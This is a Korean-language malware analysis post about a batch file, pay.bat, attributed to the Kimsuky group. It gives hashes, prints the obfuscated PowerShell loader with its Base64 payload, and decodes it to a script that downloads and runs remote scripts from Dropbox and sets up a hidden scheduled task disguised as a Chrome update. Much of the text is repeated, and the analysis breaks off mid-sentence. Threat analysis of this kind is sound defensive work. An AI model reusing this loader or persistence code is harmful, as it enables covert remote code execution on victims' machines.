APT 김수키(Kimsuky)에서 만든 악성코드-pay.bat(2024.11,27)
Contents
오늘은 APT 김수키(Kimsuky)에서 만든 악성코드-pay.bat(2024.11,27)에 대해 글을 적어 보겠습니다.
해당 악성코드는 배치 파일을 악용하는 것이 특징이면 일단 실행이 되면 현재 폭파된 드롭박스에서 무엇가 다운로드 하는 것 같습니다.
해시
파일명: pay.bat
사이즈:1,687 Bytes
MD5:b262ac518c0114f414aaedbb4ef7c728
SHA-1:fd02470c6cc4ceb5fad3589d02e5148a8c738b83
SHA-256:8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b
악성코드에 포함된 코드
@echo off
powershell/W 1 -ep bypass -w hidden -command $cmkGna
BV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0
aCAo(J)GVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAn
JGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVt(c)C5w
czEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwu(Z)HJvcGJveHVzZXJjb250ZW50LmNvbS9zY
2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT(1)yOGZlMHZpaWVyMW13dj
lhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0Z
W0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJH(N)0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZG
uZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwu
ZX(h)lJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1
yb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIi(Y)geyRhYmMgPSBKb2luLVBhdGggKC
RlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdW
xlZFRhc2tUcmlnZ2VyIC1Pbm(N)lIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25J
bnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbm(d)zID0gTmV3LVNjaGVkdW(x)l
ZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hy
b21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbi(A)tVHJpZ2dlciAkdHJpZ2dlciAtU2V0dG
luZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0Ln
BzMSI7IHdnZXQgLVVyaS(A)iaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21j
c2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3(J)sa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW(0)2czl5
Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAk
YWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);^&(
'{5}{0}{2}{1}{3}{4}{6}'-f 'o
ke','xp','-E','res','sio','Inv','n') $U9zBwFeD
코드 분석
먼저 Base 64를 벗겨야 하므로 CyberChef를 이용을 해보겠습니다.
먼저 벗기면 다음과 같은 결과를 볼 수가 있습니다.
$ppp = Join-Path ($env:AppData) "chrome(.)ps1"; $str = '$aaa = Join-Pa(t)h ($env:AppData) "temp(.)ps1"; wget -Uri "hxxxs://dl(.)dropboxusercontent(.)com/scl/fi/dkuamlrlsrbygso1swn8p/santa2-f(.)txt?rlkey=r8fe0viie(r)1mwv9azk5awy5s9&st=yvqqfdfy&dl=0" -OutFile $aaa; & $aaa; Remove(-)Item -Path $aaa -Force;'; $str | Out-File -FilePath $ppp -Encoding UTF8; $action = New-ScheduledTaskAction -Exec(u)te 'PowerShell(.)exe' -Argument '-Win(d)owStyle Hidden -nop -NonIn(t)eractive -NoProfile -Execution(P)olicy Bypass -Command "(&) {$abc = Join-Path ($(e)nv:AppData) \"chrome(.)ps1\"; & $abc;}"'; $trigger = New-ScheduledTa(s)kTrigger -Once -At (G(e)t-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskS(e)ttingsSet -Hi(d)den; R(e)gister-ScheduledTask -TaskName "ChromeUpdateTaskMachine" -Action $action -Trigger $trigger -Settings $settings; $aaa = Join-Pat(h) ($env:AppData) "system_first(.)ps1"; wget -Uri "hxxxs://dl(.)dropboxusercontent(.)com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x(.)txt?rlkey=5nbbqe(g)c5a77r76hiym6s9y2h&st=727cs1mx&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;
PowerShell 스크립트
1.chrome(.)ps1라는 이름의 PowerShell …
해당 악성코드는 배치 파일을 악용하는 것이 특징이면 일단 실행이 되면 현재 폭파된 드롭박스에서 무엇가 다운로드 하는 것 같습니다.
해시
파일명: pay.bat
사이즈:1,687 Bytes
MD5:b262ac518c0114f414aaedbb4ef7c728
SHA-1:fd02470c6cc4ceb5fad3589d02e5148a8c738b83
SHA-256:8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b
악성코드에 포함된 코드
@echo off
powershell/W 1 -ep bypass -w hidden -command $cmkGna
BV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0
aCAo(J)GVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAn
JGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVt(c)C5w
czEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwu(Z)HJvcGJveHVzZXJjb250ZW50LmNvbS9zY
2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT(1)yOGZlMHZpaWVyMW13dj
lhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0Z
W0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJH(N)0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZG
uZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwu
ZX(h)lJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1
yb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIi(Y)geyRhYmMgPSBKb2luLVBhdGggKC
RlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdW
xlZFRhc2tUcmlnZ2VyIC1Pbm(N)lIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25J
bnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbm(d)zID0gTmV3LVNjaGVkdW(x)l
ZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hy
b21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbi(A)tVHJpZ2dlciAkdHJpZ2dlciAtU2V0dG
luZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0Ln
BzMSI7IHdnZXQgLVVyaS(A)iaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21j
c2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3(J)sa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW(0)2czl5
Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAk
YWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);^&(
'{5}{0}{2}{1}{3}{4}{6}'-f 'o
ke','xp','-E','res','sio','Inv','n') $U9zBwFeD
코드 분석
먼저 Base 64를 벗겨야 하므로 CyberChef를 이용을 해보겠습니다.
먼저 벗기면 다음과 같은 결과를 볼 수가 있습니다.
$ppp = Join-Path ($env:AppData) "chrome(.)ps1"; $str = '$aaa = Join-Pa(t)h ($env:AppData) "temp(.)ps1"; wget -Uri "hxxxs://dl(.)dropboxusercontent(.)com/scl/fi/dkuamlrlsrbygso1swn8p/santa2-f(.)txt?rlkey=r8fe0viie(r)1mwv9azk5awy5s9&st=yvqqfdfy&dl=0" -OutFile $aaa; & $aaa; Remove(-)Item -Path $aaa -Force;'; $str | Out-File -FilePath $ppp -Encoding UTF8; $action = New-ScheduledTaskAction -Exec(u)te 'PowerShell(.)exe' -Argument '-Win(d)owStyle Hidden -nop -NonIn(t)eractive -NoProfile -Execution(P)olicy Bypass -Command "(&) {$abc = Join-Path ($(e)nv:AppData) \"chrome(.)ps1\"; & $abc;}"'; $trigger = New-ScheduledTa(s)kTrigger -Once -At (G(e)t-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskS(e)ttingsSet -Hi(d)den; R(e)gister-ScheduledTask -TaskName "ChromeUpdateTaskMachine" -Action $action -Trigger $trigger -Settings $settings; $aaa = Join-Pat(h) ($env:AppData) "system_first(.)ps1"; wget -Uri "hxxxs://dl(.)dropboxusercontent(.)com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x(.)txt?rlkey=5nbbqe(g)c5a77r76hiym6s9y2h&st=727cs1mx&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;
PowerShell 스크립트
1.chrome(.)ps1라는 이름의 PowerShell …
IoC
fd02470c6cc4ceb5fad3589d02e5148a8c738b83
b262ac518c0114f414aaedbb4ef7c728
8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b
b262ac518c0114f414aaedbb4ef7c728
8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b